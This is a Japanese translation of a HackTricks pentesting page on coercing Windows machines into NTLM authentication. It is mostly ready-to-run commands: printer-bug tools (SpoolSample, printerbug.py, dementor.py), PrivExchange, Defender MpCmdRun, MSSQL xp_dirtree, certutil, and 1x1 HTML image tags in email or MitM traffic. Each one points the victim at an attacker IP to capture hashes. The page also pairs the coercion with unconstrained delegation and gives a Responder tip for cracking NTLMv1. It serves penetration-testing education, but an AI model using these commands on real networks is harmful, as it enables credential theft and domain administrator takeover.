9.7 KiB
NTLM特権認証の強制
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- サイバーセキュリティ会社で働いていますか?HackTricksで会社の広告を掲載したいですか?または、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか?サブスクリプションプランをチェックしてください!
- The PEASS Familyを発見し、独占的なNFTsのコレクションをご覧ください。
- 公式PEASS & HackTricksグッズを入手してください。
- 💬 Discordグループやtelegramグループに参加するか、Twitter 🐦@carlospolopmにフォローしてください。
- ハッキングのコツを共有するために、hacktricksリポジトリとhacktricks-cloudリポジトリにPRを提出してください。
SharpSystemTriggers
SharpSystemTriggersは、3rdパーティの依存関係を避けるためにMIDLコンパイラを使用してC#でコーディングされたリモート認証トリガーのコレクションです。
スプーラーサービスの悪用
プリントスプーラー サービスが有効であれば、既知のADクレデンシャルを使用してドメインコントローラーのプリントサーバーに新しいプリントジョブの更新を要求し、通知を任意のシステムに送信するように指示することができます。
プリンターが任意のシステムに通知を送る際には、そのシステムに対して認証を行う必要があります。したがって、攻撃者は_プリントスプーラー_ サービスを任意のシステムに対して認証させることができ、この認証にはコンピュータアカウントが使用されます。
ドメイン上のWindowsサーバーの検出
PowerShellを使用して、Windowsボックスのリストを取得します。サーバーは通常優先されるので、そこに焦点を当てましょう:
Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt
スプーラーサービスのリスニングを探す
少し変更を加えた@mysmartlogin(Vincent Le Toux)のSpoolerScannerを使用して、スプーラーサービスがリスニングしているかどうかを確認します:
. .\Get-SpoolStatus.ps1
ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}
Linux上でrpcdump.pyを使用し、MS-RPRNプロトコルを探すこともできます。
rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN
任意のホストに対してサービスに認証を要求する
SpoolSample.exe <TARGET> <RESPONDERIP>
または、Linuxを使用している場合は、3xocyteのdementor.pyまたはprinterbug.pyを使用します。
python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET>
printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>
組み合わせて無制限委任を使用する
攻撃者が無制限委任を持つコンピュータを既に侵害している場合、攻撃者はプリンタをこのコンピュータに対して認証させることができます。無制限委任のため、プリンタのコンピュータアカウントのTGTは無制限委任を持つコンピュータのメモリに保存されます。攻撃者はこのホストを既に侵害しているため、このチケットを取得し、それを悪用することができます(Pass the Ticket)。
RCP 強制認証
{% embed url="https://github.com/p0dalirius/Coercer" %}
PrivExchange
PrivExchange攻撃は、Exchange Server PushSubscription機能に見つかった欠陥の結果です。この機能により、メールボックスを持つ任意のドメインユーザーが、HTTP経由で任意のクライアント提供のホストに対してExchangeサーバーを強制的に認証させることができます。
デフォルトでは、ExchangeサービスはSYSTEMとして実行され、過剰な権限(具体的には、2019年累積アップデート前のドメインにWriteDacl権限を持っています)が与えられています。この欠陥は、情報のLDAPへのリレーを有効にし、その後ドメインNTDSデータベースを抽出するために悪用される可能性があります。LDAPへのリレーが不可能な場合でも、この欠陥はドメイン内の他のホストへのリレーと認証に依然として使用できます。この攻撃の成功した悪用は、任意の認証されたドメインユーザーアカウントで直ちにドメイン管理者へのアクセスを付与します。
Windows内部
既にWindowsマシン内部にいる場合、特権アカウントを使用してWindowsをサーバーに接続させることができます:
Defender MpCmdRun
C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -Scan -ScanType 3 -File \\<YOUR IP>\file.txt
MSSQL
EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1
または、この他のテクニックを使用してください: https://github.com/p0dalirius/MSSQL-Analysis-Coerce
Certutil
certutil.exe lolbin(Microsoftが署名したバイナリ)を使用してNTLM認証を強制することが可能です:
certutil.exe -syncwithWU \\127.0.0.1\share
HTMLインジェクション
メール経由
対象のマシンにログインするユーザーのメールアドレスがわかっている場合、1x1画像を含むメールを送信することができます。
<img src="\\10.10.17.231\test.ico" height="1" width="1" />
彼がそれを開いたとき、認証を試みます。
MitM
MitM攻撃をコンピュータに対して実行し、彼が閲覧するページにHTMLを注入できる場合、次のような画像をページに注入してみることができます:
<img src="\\10.10.17.231\test.ico" height="1" width="1" />
NTLMv1のクラッキング
NTLMv1チャレンジをキャプチャできたら、こちらでクラッキング方法を読んでください。
NTLMv1をクラックするためには、Responderのチャレンジを"1122334455667788"に設定する必要があります。
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- サイバーセキュリティ会社で働いていますか?HackTricksで会社を宣伝したいですか?または、最新版のPEASSを入手したり、HackTricksをPDFでダウンロードしたいですか?サブスクリプションプランをチェックしてください!
- The PEASS Familyを発見してください。私たちの独占的なNFTsのコレクションです。
- 公式のPEASS & HackTricksグッズを手に入れましょう。
- 💬 Discordグループやテレグラムグループに参加するか、Twitter 🐦@carlospolopmにフォローしてください。
- hacktricksリポジトリやhacktricks-cloudリポジトリにPRを提出して、あなたのハッキングのコツを共有してください。